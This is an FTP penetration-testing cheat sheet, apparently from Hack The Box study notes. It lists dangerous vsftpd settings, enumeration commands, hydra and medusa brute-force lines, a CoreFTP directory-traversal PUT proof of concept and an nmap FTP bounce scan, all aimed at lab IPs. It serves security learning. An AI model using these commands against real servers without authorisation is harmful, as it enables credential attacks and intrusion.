[21] FTP

Default Configuration: /etc/vsftpd.conf

Deny users file: /etc/ftpusers

Dangerous Configuration:

Setting

Description

anonymous_enable=YES

Allowing anonymous login?

anon_upload_enable=YES

Allowing anonymous to upload files?

anon_mkdir_write_enable=YES

Allowing anonymous to create new directories?

no_anon_password=YES

Do not ask anonymous for password?

anon_root=/home/username/ftp

Directory for anonymous.

write_enable=YES

Allow the usage of FTP commands: STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, and SITE?

#Connect to FTP Server
Intrusionz3r0X@htb[/htb]$ ftp 10.129.14.136
Intrusionz3r0X@htb[/htb]$ nc -nv 10.129.14.136 21
Intrusionz3r0X@htb[/htb]$ telnet 10.129.14.136 21
# Connect to FTP with TLS/SSL encryption
Intrusionz3r0X@htb[/htb]$ openssl s_client -connect 10.129.14.136:21 -starttls ftp

#Download All Available Files
Intrusionz3r0X@htb[/htb]$ wget -m --no-passive ftp://anonymous:anonymous@10.129.14.136
#Nmap Enumeration
Intrusionz3r0X@htb[/htb]$ sudo nmap -sV -p21 -sC -A 10.129.14.136 #--script-trace

#Brute Force
Intrusionz3r0X@htb[/htb]$ medusa -U users.list  -P passwords.list  -h 10.129.23.100 -M ftp -t 30 -F #-n 2121
Intrusionz3r0X@htb[/htb]$ hydra -L users.list -P passwords.list ftp://10.129.202.221 -t 64

#CoreFTP Server build 725 - Directory Traversal (Authenticated)
Intrusionz3r0X@htb[/htb]$ curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops

FTP Bounce Attack

An FTP bounce attack is a network attack that uses FTP servers to deliver outbound traffic to another device on the network. The attacker uses a PORT command to trick the FTP connection into running commands and getting information from a device other than the intended server.

#FTP Bounce Attack
Intrusionz3r0X@htb[/htb]$ nmap -Pn -v -n -p80 -b anonymous:password@10.10.110.213 172.17.0.2

Previous[22] SSH Next[25,465,587] SMTP